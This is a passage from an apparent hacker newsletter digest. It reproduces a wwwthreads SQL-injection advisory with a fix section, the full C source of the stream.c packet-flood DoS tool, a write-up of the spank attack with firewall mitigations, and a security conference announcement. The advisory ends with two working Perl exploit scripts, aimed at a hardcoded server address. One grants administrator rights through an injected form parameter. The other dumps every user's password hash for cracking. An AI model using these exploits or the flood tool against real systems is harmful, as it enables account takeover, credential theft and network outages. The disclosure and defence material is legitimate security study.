commands, we at least need to give a valid command string to parse...in
this case, we feed a generic select (similiar to the original) back to it.
The result of this (theoretically) is to drop (delete) the general forum
table.
But in reality, it doesn't work. Not because the theory is wrong, but
because the database user we're using doesn't have DROP privileges. And
due to how wwwthreads is written, it won't quite let you do much with
this. But all is not lost, we can just start changing all numbers left and
right, looking for where it blows up...or we can go the easy route and
download the (eval) source code from www.wwwthreads.com. Yeah, kind of
cheating, but it's not quite a one-to-one solution.
You see, the eval code and the license code (of which PacketStorm is
running) are slightly different, including their SELECT statements. So we
have to be a little creative. First, let's find the SELECT statement (or
equivalent) that's featured above.
I like to use less, so I just 'less showpost.pl', and search (the '/' key)
for 'SELECT'. We come up with
# Grab the main post number for this thread
$query = qq!
SELECT Main,Last_Post
FROM $Board
WHERE Number=$Number
!;
Wow, that's it..except the field names (Main,Last_Post,Number) are
different than the pro version (B_Main,B_Last_Post,B_Number). If we look
right above it, we see
# Once and a while it people try to just put a number into the url,
if (!$Number) {
w3t::not_right("There was a problem looking up the Post...
Which is what limits the use of the $Number parameter.
At this point let's now evaluate 'why' we want to go forth into this.
Obviously DROP'ing tables ranks right up there with other stupid DoS
tricks. You may be able to modify other people's posts, but that's lame
too. Perhaps setting up our own forum? All that information is stored in
the DB. But that's a lot of records to update. How about becoming a
moderator? Or even better, an administrator? Administrators can add,
delete, and modify forums, boards, and users. That may be a worthy goal,
although your still only limited to the realm of the forum, which makes
you a king of a very small and pitiful domain.
However, there is one thing worthy. If you make yourself a user account,
you'll notice you have to enter a password. Hmmm...those passwords are
stored someplace...like, in the database. If we hedge our 'password
reuse' theory, and combined with the fact that wwwthreads (in some
configurations) post the IP address of the poster, we have some
possibilities worth checking out.
So, let's look at this password thing. Going into 'edit profile' gives us
a password field, which looks an awful lot like a crypt hash (view the
HTML source). Damn, so the passwords are hashed. Well, that just means
you'll need a password cracker and more time before you can start checking
on password reuse. Assuming we *can* get the passwords......
Let's start with the administrator access first. The adduser.pl script is
a good place to start, since it should show us all parameters of a user.
Notice the following code
# --------------------------------------
# Check to see if this is the first user
$query = qq!
SELECT Username
FROM Users
!;
$sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr.
Query: $query";
$sth -> execute() or die "Can't execute query: $query. Reason:
$DBI::errstr";
my $Status = "";
my $Security = $config{'user_security'};
my $rows = $sth -> rows;
$sth -> finish;
# -------------------------------------------------------
# If this is the first user, then status is Administrator
# otherwise they are just get normal user status.
if (!$rows){
$Status = "Administrator";
$Security = 100;
} else {
$Status = "User";
}
What this does is look to see if any users are defined. If no users are
defined, the first user added gets the Status of 'Administrator' and a
security level of 100. After that, all added users just get Status=User.
So we need to find a way to make our Status=Administrator. A full user
record can be seen a little further down...
# ------------------------------
# Put the user into the database
my $Status_q = $dbh -> quote($Status);
$Username_q = $dbh -> quote($Username);
my $Email_q = $dbh -> quote($Email);
my $Display_q = $dbh -> quote($config{'postlist'});
my $View_q = $dbh -> quote($config{'threaded'});
my $EReplies_q = $dbh -> quote("Off");
$query = qq!
INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
Display,View,PostsPer,EReplies,Security,Registered)
VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
$Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
!;
Now, I should take a moment here and explain the quote() function. A
string value of "blah blah blah", when stuck into a query that looks like
"SELECT * FROM table WHERE data=$data" will wind up looking like
SELECT * FROM table WHERE data=blah blah blah
which is not valid. The database doesn't know what to do with the extra
two blah's, since they look like commands. Therefore all string data need
to be encapsulated in single quotes ('). Therefore the query should look
like
SELECT * FROM table WHERE data='blah blah blah'
which is correct. Now, in my SQL appension article I talk about 'breaking
out' of the single quote string by including your own single quote. So if
we submitted "blah blah' MORE SQL COMMANDS...", it would look like
SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
data we submitted
This causes the SQL engine to interpret the MORE SQL COMMANDS as actual
SQL commands, since if figured the 'data' part of the string ended with
the second single quote (the one we submitted). This is a drawback of
converting data into a 'human readable' string, to be parsed back into
data again...it's hard to determine what's 'code/commands' and what's
'data'.
All is not lost, however. By submitting a '', it tells the SQL engine to
NOT end the data string, but rather only think of it as a single quote in
the data context. Therefore the following query
SELECT * FROM table WHERE data='data''more data'
makes the database look for the value "data'more data". So to keep people
from breaking out of strings and submitting extra SQL commands, all you
have to do is double up every single quote (turn ' into ''). This will
ensure that all data is indeed considered data. And this is what the
DBI->quote() function does--it will put single quotes around the string,
and double all single quotes in the string.
So after all of that explaination, the short of it is that anything that
is run through quote() is of no use to use, because we can't submit extra
SQL commands or otherwise tamper with anything fun. And if you look,
wwwthreads uses quote() extensively. So this may be rough. But all is
not lost...
You see, there are different field types. You can have strings, boolean
values, various numeric values, etc. While a string field needs to be in
the format of field='data', a numeric field doesn't use the '' (i.e.
numeric_field='2' is invalid). The correct syntax for numeric fields in
numeric_field=2. Ah ha! There's no quotes to deal with, and you can't
even use quotes anyways. The correct solution is to make sure all numeric
field data is indeed numeric (more on this later). But I'll give you a
hint...wwwthreads doesn't go that far (nor do most applications,
actually).
So, now we need a SQL statement that preferably deals with a table we are
interested in. A SELECT statement (retrieves data) is tougher, since
we'll need to include a whole 'nother query to do something other than
SELECT. INSERT and UPDATE are nice because we're already modifying
data...we can just ride in more data to update (hopefully).
Poking around brings us to a very nice spot...changeprofile.pl. This is
the script that takes data entered in editprofile.pl and enters the
changes into the database. Of course, the profile is our user profile.
This means to use this, we need a valid user account. In any event, let's
have a look-see...
# Format the query words
my $Password_q = $dbh -> quote($Password);
my $Email_q = $dbh -> quote($Email);
my $Fakeemail_q = $dbh -> quote($Fakeemail);
my $Name_q = $dbh -> quote($Name);
my $Signature_q = $dbh -> quote($Signature);
my $Homepage_q = $dbh -> quote($Homepage);
my $Occupation_q = $dbh -> quote($Occupation);
my $Hobbies_q = $dbh -> quote($Hobbies);
my $Location_q = $dbh -> quote($Location);
my $Bio_q = $dbh -> quote($Bio);
my $Username_q = $dbh -> quote($Username);
my $Display_q = $dbh -> quote($Display);
my $View_q = $dbh -> quote($View);
my $EReplies_q = $dbh -> quote($EReplies);
my $Notify_q = $dbh -> quote($Notify);
my $FontSize_q = $dbh -> quote($FontSize);
my $FontFace_q = $dbh -> quote($FontFace);
my $ICQ_q = $dbh -> quote($ICQ);
my $Post_Format_q= $dbh -> quote($Post_Format);
my $Preview_q = $dbh -> quote($Preview);
Ack! Practically everything is quoted! That means all those parameters
are useless to us. And lets peek at the final actual query that sticks
all our information back into the database
# Update the User's profile
my $query =qq!
UPDATE Users
SET Password = $Password_q,
Email = $Email_q,
Fakeemail = $Fakeemail_q,
Name = $Name_q,
Signature = $Signature_q,
Homepage = $Homepage_q,
Occupation = $Occupation_q,
Hobbies = $Hobbies_q,
Location = $Location_q,
Bio = $Bio_q,
Sort = $Sort,
Display = $Display_q,
View = $View_q,
PostsPer = $PostsPer,
EReplies = $EReplies_q,
Notify = $Notify_q,
TextCols = $TextCols,
TextRows = $TextRows,
FontSize = $FontSize_q,
FontFace = $FontFace_q,
Extra1 = $ICQ_q,
Post_Format = $Post_Format_q,
Preview = $Preview_q
WHERE Username = $Username_q
!;
Since wwwthreads nicely slaps the '_q' on the variables, it's easy to see.
See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted. Now,
let's figure out where that data comes from
my $Sort = $FORM{'sort_order'};
my $PostsPer = $FORM{'PostsPer'};
my $TextCols = $FORM{'TextCols'};
my $TextRows = $FORM{'TextRows'};
Wow, they're taken straight from the submitted form data. That means they
are not checked or validated in any way. Here's our chance!
Going back to structure of the user record (given above), there's a
'Status' field we need to change. Looking in this UPDATE query, Status
isn't listed. So this means that the Status field is going to remain
unchanged. Bummer. See what we're going to do yet? Take a second and
think about it.
Remember, all of this hinges around the fact that we want to submit what
looks like data, but in the end, the SQL engine/database will interpret it
differently. Notice in the query that the fields are listed in the format
of field=value, field=value, field=value, etc (of course, they're on
separate lines). If I were to insert some fake values (for the sake of
example), I might have
Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/'
All I did was put the fields on the same line, collapse the whitespace,
and fill in the (quoted) string values. This is valid SQL.
Now, let's put this all together. Looking at the the 'Sort' variable
(which is numeric), we would feasibly have
Bio='puppy', Sort=5, Display='threaded'
which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the
above value for Sort was given by submitting the parameter sort_order=5.
Now, let's use Sort to our advantage. What if we were to include a comma,
and then some more column values? Oh, say, the Status field? Let's set
the sort_order parameter to "5, Status='Administrator',", and then let it
run its course. Eventually we'll get a query that looks like
Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
^^^^^^^^^^^^^^^^^^^^^^^^^^
our submitted data
This is still valid SQL! And furthermore, it will cause the database to
update the Status field to be 'Administrator'! But remember when we
looked in adduser.pl, the first user had a Security level of 100. We want
that to, so we just set the sort_order parameter to "5,
Status='Administrator', Security=100,", and then we get
Bio='puppy', Sort=5, Status='Administrator', Security=100, ...
which updates both values to what we want. The database not knowing any
better will update those two fields, and now the forums will think we're
an administrator.
So I go to apply this new technique on PacketStorm...and get a 404 for
requests to changeprofile.pl. Yep, the pro version doesn't have it.
Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile',
'Display Preferences', and 'Email Notifications/Subscriptions', which the
demo does not (it's all lumped together). Wonderful. If they changed the
scripts around, they may have also changed the SQL queries (well they had
to, actually). So now we're in 'blackbox' mode (blindly making educated
guesses on what's going on). Since we want to play with the sort_order
parameter still, you'll see that it's contained in the 'Display
Preferences' script (editdisplay.pl). This script handles the sort_order,
display, view, PostPer, Post_Format, Preview, TextCols, TextRows,
FontSize, FontFace, PictureView, and PicturePost (gained by viewing the
HTML source). So it's a subset of the parameters. Using the above code
snippets, we can guess at what the SQL query looking like. So why not
give it a shot.
First I poke some invalid values into sort_order (characters instead of
numbers). This causes an error, which I figured. Since, in the first
example how the fields where 'B_' for the 'Board' table, the 'User' table
(which we are now using) prefixes colums with a 'U_'. So that means we
need to use 'U_Status' and 'U_Security' for field names. Good thing we
checked.
Since this needs to be a valid form submit, we need to submit values for
all of the listed variables. At this point I should also point out
(again) we need a valid user account of which to increase the status.
We'll need the username and password (hash), which are printed as hidden
form elements on various forms (like editdisplay.pl). You'll see the
parameters are Username and Oldpass. So based on all of this, we can
construct a URL that looks like
changedisplay.pl? Cat=&
Username=rfp
&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
&display=threaded
&view=collapsed
&PostsPer=10
&Post_Format=top
&Preview=on
&TextCols=60
&TextRows=5
&FontSize=0
&FontFace=
&PictureView=on
&PicturePost=off
The important one of course being
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
which is just an escaped version of what we used above (the %3d translate
to the '=' character). When you lump it all together into a single
string, you get
changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded
&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60
&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off
which, while gross, is what it needs to be. So, I submit this to
PacketStorm, and get
Your display preferences have been modified.
Wonderful. But, noticing on the top menu, I see an 'Admin' option now. I
click it, and what do I see but the heart warming message of
As an Administrator the following options are available to you.
Bingo! Administrator privileges! Looking at my options, I can edit
users, boards, or forums, assign moderators and administrators, ban
users/hosts, expire/close/open threads, etc.
Now for our second objective...the passwords. I go into 'Show/Edit
Users', and am asked to pick the first letter of the usernames I'm
interested in. So I pick 'R'. At list of all 'R*' users comes up. I
click on 'rfp'. And there we go, my password hash. Unfortunately,
there's no nice and easy way to dump all users and their hashes. Bummer.
So I automated a perl script to do it for me, and dump the output in a
format that can be fed into John the Ripper.
----[ 3. Solution
Now, how to defend against this? As you saw, the reason this worked was
due to non-restricted data being passed straight into SQL queries.
Luckily wwwthreads quoted (most) string data, but they didn't touch
numeric data. The solution is to make sure numeric data is indeed
numeric. You can do it the 'silent' way by using a function like so
sub onlynumbers {
($data=shift)=~tr/0-9//cd;
return $data;}
And similar to how all string data is passed through DBI->quote(), pass
all numeric data through onlynumbers(). So, for the above example, it
would be better to use
my $Sort = onlynumbers($FORM{'sort_order'});
Another area that needs to be verified is the table name. In our very
first example, we had 'Board=general'. As you see here, a table name is
not quoted like a string. Therefore we also need to run all table names
through a function to clean them up as well. Assuming table names can
have letters, numbers, and periods, we can scrub it with
sub scrubtable {
($data=shift)=~tr/a-zA-Z0-9.//cd;
return $data;}
which will remove all other cruft.
In the end, *all* (let me repeat that... **ALL**) incoming user data
should be passed through quote(), onlynumbers(), or scrubtable()...NO
EXCEPTIONS! Passing user data straight into a SQL query is asking for
someone to tamper with your database.
New versions of wwwthreads are available from www.wwwthreads.com, which
implement the solutions pretty much as I've described them here.
----[ 4. Conclusion
I've included two scripts below. wwwthreads.pl will run the query for you
against a pro version of wwwthreads. You just have to give the ip
address of the server running wwwthreads, and a valid user and password
hash. w3tpass.pl will walk and download all wwwthreads user password
hashes, and give output suitable for password cracking with John the
Ripper.
Thanks to PacketStorm for being a good sport about this.
- Rain Forest Puppy / rfp@wiretrip.net
- I feel a rant coming on...
----[ 5. Included perl scripts
-[ wwwthreads.pl
#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;
#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";
#####################################################
$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";
$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";
print sendraw($tosend);
sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
-[ w3tpass.pl
#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authenciation and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;
#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";
#####################################################
@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";
foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";
my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
push @users, $1;}}}
$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
"Fetching individual passwords...\r\n";
foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";
my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $user.':'.$pass."::::::::::\n";
last;}}}
print STDERR "done.\r\n\r\n";
sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
# Greets to everyone who hasn't used RDS to deface a website (small crowd)
--- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip ---
SQL hacking has many ins, many outs; there's many levels of complexity...
--- Advisory RFP2K01 ------------------------------ rfp.labs ------------
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
13.0 The stream.c exploit
~~~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int ip_hl:4, /* header length in 32 bit words */
ip_v:4; /* ip version */
u_char ip_tos; /* type of service */
u_short ip_len; /* total packet length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset */
u_char ip_ttl; /* time to live */
u_char ip_p; /* protocol */
u_short ip_sum; /* ip checksum */
u_long saddr, daddr; /* source and dest address */
};
struct tcp_hdr {
u_short th_sport; /* source port */
u_short th_dport; /* destination port */
u_long th_seq; /* sequence number */
u_long th_ack; /* acknowledgement number */
u_int th_x2:4, /* unused */
th_off:4; /* data offset */
u_char th_flags; /* flags field */
u_short th_win; /* window size */
u_short th_sum; /* tcp checksum */
u_short th_urp; /* urgent pointer */
};
struct tcpopt_hdr {
u_char type; /* type */
u_char len; /* length */
u_short value; /* value */
};
struct pseudo_hdr { /* See RFC 793 Pseudo Header */
u_long saddr, daddr; /* source and dest address */
u_char mbz, ptcl; /* zero and protocol */
u_short tcpl; /* tcp length */
};
struct packet {
struct ip/*_hdr*/ ip;
struct tcphdr tcp;
/* struct tcpopt_hdr opt; */
};
struct cksum {
struct pseudo_hdr pseudo;
struct tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
void usage(char *progname)
{
fprintf(stderr, "Usage: %s <dstaddr> <dstport> <pktsize> <pps>\n",
progname);
fprintf(stderr, " dstaddr - the target we are trying to attack.\n");
fprintf(stderr, " dstport - the port of the target, 0 = random.\n");
fprintf(stderr, " pktsize - the extra size to use. 0 = normal
syn.\n");
exit(1);
}
/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits. */
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
u_long lookup(char *hostname)
{
struct hostent *hp;
if ((hp = gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s.\n", hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
void flooder(void)
{
struct timespec ts;
int i;
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 10;
packet.ip.ip_hl = 5;
packet.ip.ip_v = 4;
packet.ip.ip_p = IPPROTO_TCP;
packet.ip.ip_tos = 0x08;
packet.ip.ip_id = rand();
packet.ip.ip_len = FIX(sizeof(packet));
packet.ip.ip_off = 0; /* IP_DF? */
packet.ip.ip_ttl = 255;
packet.ip.ip_dst.s_addr = random();
packet.tcp.th_flags = 0;
packet.tcp.th_win = htons(16384);
packet.tcp.th_seq = random();
packet.tcp.th_ack = 0;
packet.tcp.th_off = 5; /* 5 */
packet.tcp.th_urp = 0;
packet.tcp.th_dport = dstport?htons(dstport):rand();
/*
packet.opt.type = 0x02;
packet.opt.len = 0x04;
packet.opt.value = htons(1460);
*/
cksum.pseudo.daddr = dstaddr;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = dstaddr;
s_in.sin_port = packet.tcp.th_dport;
for(i=0;;++i) {
/*
patched by 3APA3A to send 1 syn packet + 1023 ACK packets.
*/
if( !(i&0x4FF) ) {
packet.tcp.th_sport = rand();
cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
packet.tcp.th_flags = TH_SYN;
packet.tcp.th_ack = 0;
}
else {
packet.tcp.th_flags = TH_ACK;
packet.tcp.th_ack = random();
}
/* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */
++packet.ip.ip_id;
/*++packet.tcp.th_sport*/;
++packet.tcp.th_seq;
if (!dstport)
s_in.sin_port = packet.tcp.th_dport = rand();
packet.ip.ip_sum = 0;
packet.tcp.th_sum = 0;
cksum.tcp = packet.tcp;
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
perror("jess");
}
}
int main(int argc, char *argv[])
{
int on = 1;
printf("stream.c v1.0 - TCP Packet Storm\n");
if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (argc < 4)
usage(argv[0]);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) <
0) {
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
printf("\nResolving IPs..."); fflush(stdout);
dstaddr = lookup(argv[1]);
dstport = atoi(argv[2]);
pktsize = atoi(argv[3]);
printf("Sending..."); fflush(stdout);
flooder();
return 0;
}
@HWA
14.0 Spank, variation of the stream.c DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------
Explanation of the 'spank' attack
-- a new breed stream/raped
------------------------------------------------
By: lst (yardley@uiuc.edu)
This is a tad different than the previous release. Stream/Raped mearly
flooded the host with ack's (or no flags) and came from random ips with
random sequence numbers and/or ack numbers. The difference now is that
this not only does the previous stuff, but also directly attacks from and
to multicast addresses as well. Just as before, rate limiting should be
done to counteract its effect (the same idea as ICMP_BANDLIM). The
multicast handling should also be checked to verify that it is behaving
properly.
The attacker specifies the port[s] that they want to send the attack to,
depending on what ports are selected, you will have different net
results. If the port is an open port, then you will possibly have a longer
kernel path to follow before the drop. Therefore, a smart attacker will
hit open ports, but havoc can also come about from random ports due to
states and processing.
In the best case scenario, you will experience only the lag of the flood
and the lag of the processing (currently) and then be fine when the
attacker stops, In the worst case, you lockup, kill the network, and
possibly have to reboot. Once you patch it, you deal with a lot less
processing time (the drops are handled without the RST flag when
appropriate--bandlim type idea). In other words, you go to the drop
routine instead of dropwithrst silencing your response, which decreases
your processing time, the hit on your network, and the effect of the flood
(once a threshold is reached, all those bad packets are silently dropped
and the attack has less of a net effect).
The filters that were presented at the beginning of this email will block
all multicast packets that come out (and in) the tcp stack I have been
getting mailed a lot about this. Here is why I said the previous
statement. Receiving a packet with no flags is considered an illegal
packet (obviously) and is often dumped, however, as we have seen in
the past, illegal packets often wreak havoc and often go untested.
There is very little that "raped.c" or "stream.c" actually showed as
problems in the TCP/IP stacks. The true problem lies more in the effects
of the response (caused by the attack). This is the same concept as the
SYN floods of yesteryear, and the same type of thing will be done to handle
it. The main difference is that it will be on a simpler note because there
isn't much need for a "cookie" based system. One should just throttle the
response of the reset packets which in turn will help stop the storm that
you generate and in general, harden the tcp/ip stack to behave the way it
is supposed to.
The main effect of this attack is that you are shooting back RST+ACK's at
all the spoofed hosts. Obviously, a lot of these hosts will not exist and
you will get ICMP unreaches (as an example) bounced back at you. There are
other possibilities as well, but unreach would be the most common
(redirects might be common as well although i did not spend the time to
analyze that). The ones that don't respond back may send you some packets
back as well (depending on if the port was valid or not and what their
firewall rules are). This type of attack is complicated by the multicasts,
and the effect is amplified as well. All in all, it becomes very nasty
very quick. Basically, this causes a nice little storm of packets, in the
ideal case.
Note that I said ideal case in the previous paragraph. This is not always
the observed behavior. It all depends on what is on the subnet, what type
of packets are recieved, what rules and filters you have setup, and even
the duration of the flood. It has been pointed out several times that the
machine will go back to normal once the attack is stopped, which is exactly
why something like ICMP_BANDLIM will work.
I have also been asked a lot about what this "bug" affects. I have seen it
have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has
also seemed to affect some hubs, switches, routers, or gateways since
entire subnets have "disappeared" briefly after the attack. The multicast
attack seems to be more deadly to teh network than the previous attack and
its affects get amplified and even carried over to the rest of the network
(bypassing secluded network bounds). I don't have more specifics on the
systems affected because of the difficulty in testing it (and keeping the
network up) since I do not have local access to the networks that I tested
on, and remote access gets real ugly real fast.
Another possibility that has been suggested as to why some machines die is
that the machine's route table is being blown up by the spoofed
packets. Each spoofed packet has a different source address which means
that a temporary route table entry is being created for each one. These
entries take time to timeout. Use 'vmstat -m' and check the 'routetbl'
field while the attack is going on.
Route table entries can be controlled somewhat under freebsd with:
[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128
You can do the following, to help if the route table is at least part of
the problem:
sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2
Things that will help:
1. Drop all multicast packets (ingress and egress) that are addressed to
the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else
that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn
I hope that this helps, or explains a little more at least.
---------------------------------------------------
Temporary remedy
---------------------------------------------------
If you use ipfilter, this MAY help you, but the issue is quite a bit
different than the previous issue.
-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --
optionally, a rule like the following could be inserted to handle outgoing
packets (if they send from the firewall somehow) but you have bigger
problems than the attack if that is the case.
-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --
That will help you "stop" the attack (actually it will just help minimize
the affects), although it will still use some CPU though
Note: If you use IPFW, there is no immediate way to solve this problem due
to the fact that it is a stateless firewall. If you are getting attacked,
then temporarily use ipfilter (or any other state based firewall) to stop
it. Otherwise, wait for vendor patches or read more about the explanation
for other possible workarounds.
FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff
-----------------------
Conclusion
-----------------------
This bug was found in testing. It seems a bit more lethal than the
previous and should be addressed as such. Patches should be available now,
but I do not follow all the platforms.
--------------------
References
--------------------
This was done independantly, although some of the analysis and reverse
engineering of concept was done by other people. As a result, I would like
to give credit where credit is due. The following people contributed in
some way or another:
Brett Glass <brett@lariat.org>
Alfred Perlstein <bright@wintelcom.net>
Warner Losh <imp@village.org>
Darren Reed <avalon@coombs.anu.edu.au>
Don Lewis <Don.Lewis@tsc.tdk.com>
Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)
-------------------
Attached
-------------------
These programs are for the sake of full disclosure, don't abuse
them. Spank was written with libnet, so you will need to obtain that as
well. You can find that at http://www.packetfactory.net/libnet
For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff
For spank.c:
http://www.w00w00.org/files/spank/spank.c
@HWA
15.0 Canadian Security Conference announcement: CanSecWest.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Canc0n may have failed as the first security/hacker con in Canada so here
is a promising sounding event pulled off by professional boys.
CanSecWest/core00
April, 19th, 20th, 21st, 2000
Vancouver, BC, Canada.
"Every IT/Security person who can attend, should attend.CanSecWest/core00
promises to be the hardest hitting, most informative, and useful network
security event ever held in Canada."
Website: http://www.dursec.com/
Some high profile speakers are scheduled to appear:
Noted speakers include:
Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network
Security Wizards and authored the Dragon intrusion detection system. Ron will
discuss intrusion detection sensors, drawing upon his large base of practical
experience in the area.
Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com.
The infamous "tattooman" from genocide2600 now of Ernst&Young's security team
will give some pointers on NT security.
Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior software engineer
on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways
to "snort" out intruders.
